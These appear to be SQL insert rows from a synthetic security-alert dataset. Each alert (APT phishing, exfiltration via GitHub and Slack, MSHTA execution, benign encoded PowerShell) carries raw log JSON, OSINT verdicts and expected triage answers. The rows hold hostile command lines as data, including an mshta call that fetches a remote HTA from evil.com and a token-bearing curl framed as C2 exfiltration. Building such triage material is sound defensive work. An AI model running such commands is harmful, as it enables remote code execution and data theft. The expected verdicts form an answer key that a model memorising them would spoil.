(1751, 'Cozy Bear Spear-Phishing Attempt with Malicious Link', 'high', 'Anomali', 'A spear-phishing email sent by Cozy Bear containing a malicious link was detected. The email was targeted towards a high-profile user.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:45:10Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.5.25\",\"username\":\"ceo@company.com\",\"hostname\":\"ceo-pc\",\"email_sender\":\"alerts@secure-mail.com\",\"request_body\":\"Click here to view your secure message: http://malicious-link.com\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing page replicating a secure login prompt\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"alerts@secure-mail.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Email address associated with multiple phishing campaigns\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a malicious link disguised as a secure message, typical of Cozy Bear phishing tactics.\"}', 'Advanced', 'TI', 7, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:10Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.5.25\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"ceo-pc\\\",\\\"email_sender\\\":\\\"alerts@secure-mail.com\\\",\\\"request_body\\\":\\\"Click here to view your secure message: http://malicious-link.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:10Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.5.25\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"ceo-pc\\\",\\\"email_sender\\\":\\\"alerts@secure-mail.com\\\",\\\"request_body\\\":\\\"Click here to view your secure message: http://malicious-link.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:10Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.5.25\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"ceo-pc\\\",\\\"email_sender\\\":\\\"alerts@secure-mail.com\\\",\\\"request_body\\\":\\\"Click here to view your secure message: http://malicious-link.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:10Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.5.25\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"ceo-pc\\\",\\\"email_sender\\\":\\\"alerts@secure-mail.com\\\",\\\"request_body\\\":\\\"Click here to view your secure message: http://malicious-link.com\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.178Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:10Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.5.25\\\",\\\"username\\\":\\\"ceo@company.com\\\",\\\"hostname\\\":\\\"ceo-pc\\\",\\\"email_sender\\\":\\\"alerts@secure-mail.com\\\",\\\"request_body\\\":\\\"Click here to view your secure message: http://malicious-link.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1752, 'Fancy Bear Data Exfiltration via GitHub', 'critical', 'Recorded Future', 'Anomalous data transfer to a GitHub repository suspected to be used by Fancy Bear for exfiltrating sensitive data.', 'Data Exfil', 'T1041', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.200.5\",\"dst_ip\":\"140.82.112.3\",\"username\":\"analytics\",\"hostname\":\"data-node-07\",\"request_body\":\"POST /repos/fancybear/exfil.git\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"140.82.112.3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"GitHub IP associated with suspicious repositories\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"POST /repos/fancybear/exfil.git\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious POST request to GitHub repository\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer to a GitHub repository aligns with known Fancy Bear data exfiltration methods.\"}', 'Advanced', 'TI', 7, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.200.5\\\",\\\"dst_ip\\\":\\\"140.82.112.3\\\",\\\"username\\\":\\\"analytics\\\",\\\"hostname\\\":\\\"data-node-07\\\",\\\"request_body\\\":\\\"POST 
/repos/fancybear/exfil.git\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.200.5\\\",\\\"dst_ip\\\":\\\"140.82.112.3\\\",\\\"username\\\":\\\"analytics\\\",\\\"hostname\\\":\\\"data-node-07\\\",\\\"request_body\\\":\\\"POST /repos/fancybear/exfil.git\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.200.5\\\",\\\"dst_ip\\\":\\\"140.82.112.3\\\",\\\"username\\\":\\\"analytics\\\",\\\"hostname\\\":\\\"data-node-07\\\",\\\"request_body\\\":\\\"POST /repos/fancybear/exfil.git\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.200.5\\\",\\\"dst_ip\\\":\\\"140.82.112.3\\\",\\\"username\\\":\\\"analytics\\\",\\\"hostname\\\":\\\"data-node-07\\\",\\\"request_body\\\":\\\"POST /repos/fancybear/exfil.git\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.181Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T11:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.200.5\\\",\\\"dst_ip\\\":\\\"140.82.112.3\\\",\\\"username\\\":\\\"analytics\\\",\\\"hostname\\\":\\\"data-node-07\\\",\\\"request_body\\\":\\\"POST /repos/fancybear/exfil.git\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1753, 'APT41 Zero-Day Exploitation via MSHTA', 'critical', 'MISP', 'APT41 was observed using a zero-day vulnerability with MSHTA to execute malicious scripts remotely.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:15:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.30.15\",\"dst_ip\":\"203.0.113.100\",\"username\":\"mark\",\"hostname\":\"workstation-10\",\"command_line\":\"mshta.exe http://evil.com/malicious.hta\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to distribution of malicious HTA scripts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta.exe http://evil.com/malicious.hta\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"MSHTA used to execute remote malicious scripts\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"APT41 known for leveraging MSHTA in zero-day attacks for remote code execution.\"}', 'Advanced', 'TI', 7, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.30.15\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"mark\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"mshta.exe http://evil.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.30.15\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"mark\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"mshta.exe http://evil.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.30.15\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"mark\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"mshta.exe http://evil.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.30.15\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"mark\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"mshta.exe http://evil.com/malicious.hta\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.195Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:15:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.30.15\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"mark\\\",\\\"hostname\\\":\\\"workstation-10\\\",\\\"command_line\\\":\\\"mshta.exe http://evil.com/malicious.hta\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 
100\"}}', 0),
(1754, 'Suspicious PowerShell Activity with Encoded Commands', 'medium', 'ThreatConnect', 'Detected PowerShell execution with encoded commands indicative of possible obfuscation, but analysis shows benign activity.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T13:42:17Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.50.30\",\"dst_ip\":\"N/A\",\"username\":\"admin\",\"hostname\":\"server-12\",\"command_line\":\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Encoded PowerShell command decoded to benign administrative script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command was found to be a legitimate administrative script.\"}', 'Advanced', 'TI', 7, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:42:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.30\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-12\\\",\\\"command_line\\\":\\\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:42:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.30\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-12\\\",\\\"command_line\\\":\\\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:42:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.30\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-12\\\",\\\"command_line\\\":\\\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:42:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.30\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-12\\\",\\\"command_line\\\":\\\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.207Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:42:17Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.50.30\\\",\\\"dst_ip\\\":\\\"N/A\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server-12\\\",\\\"command_line\\\":\\\"powershell.exe -enc SQBTAFQAZwBlAHQALQBXAEkAbgBkAG8AdwAgAEEAZABkAGkAdABpAG8AbgBhAGwAIAAtAFQAbwBkAGEAeQApAA==\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1755, 'False Positive: Network Scanner Misidentified as Brute Force', 'medium', 'Anomali', 'A network scanner was flagged as a brute force attack due to repetitive login attempts, but was later identified as a legitimate security scan.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.100.50\",\"dst_ip\":\"192.168.100.10\",\"username\":\"scanner\",\"hostname\":\"scanner-host\",\"request_body\":\"Failed_login_attempts: 25\"}', '2026-03-15 19:53:09', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.100.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network scanner performing authorized security assessment\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity was part of a scheduled security scan, mistaken for a brute force attack.\"}', 'Advanced', 'TI', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.217Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.100.50\\\",\\\"dst_ip\\\":\\\"192.168.100.10\\\",\\\"username\\\":\\\"scanner\\\",\\\"hostname\\\":\\\"scanner-host\\\",\\\"request_body\\\":\\\"Failed_login_attempts: 25\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.217Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.100.50\\\",\\\"dst_ip\\\":\\\"192.168.100.10\\\",\\\"username\\\":\\\"scanner\\\",\\\"hostname\\\":\\\"scanner-host\\\",\\\"request_body\\\":\\\"Failed_login_attempts: 25\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.217Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.100.50\\\",\\\"dst_ip\\\":\\\"192.168.100.10\\\",\\\"username\\\":\\\"scanner\\\",\\\"hostname\\\":\\\"scanner-host\\\",\\\"request_body\\\":\\\"Failed_login_attempts: 25\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.217Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.100.50\\\",\\\"dst_ip\\\":\\\"192.168.100.10\\\",\\\"username\\\":\\\"scanner\\\",\\\"hostname\\\":\\\"scanner-host\\\",\\\"request_body\\\":\\\"Failed_login_attempts: 25\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.217Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.100.50\\\",\\\"dst_ip\\\":\\\"192.168.100.10\\\",\\\"username\\\":\\\"scanner\\\",\\\"hostname\\\":\\\"scanner-host\\\",\\\"request_body\\\":\\\"Failed_login_attempts: 
25\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1756, 'APT29 C2 Communication Detected via Slack', 'critical', 'Recorded Future', 'Detected communication with a known APT29 Command and Control server through Slack, indicating potential data exfiltration.', 'Data Exfil', 'T1102', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"104.16.59.37\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAPTOP-01\",\"command_line\":\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\"}', '2026-03-15 19:55:05', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"104.16.59.37\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple APT29 C2 activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised machine\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual Slack API usage detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of Slack as a C2 channel indicates advanced evasion techniques by APT29.\"}', 'Expert', 'TI', 9, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.227Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"104.16.59.37\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"command_line\\\":\\\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.227Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"104.16.59.37\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"command_line\\\":\\\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.227Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"104.16.59.37\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"command_line\\\":\\\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.227Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"104.16.59.37\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"command_line\\\":\\\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.227Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"104.16.59.37\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"command_line\\\":\\\"curl -H \'Authorization: Bearer xoxb-1234567890-0987654321-abcdef\' https://slack.com/api/chat.postMessage\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
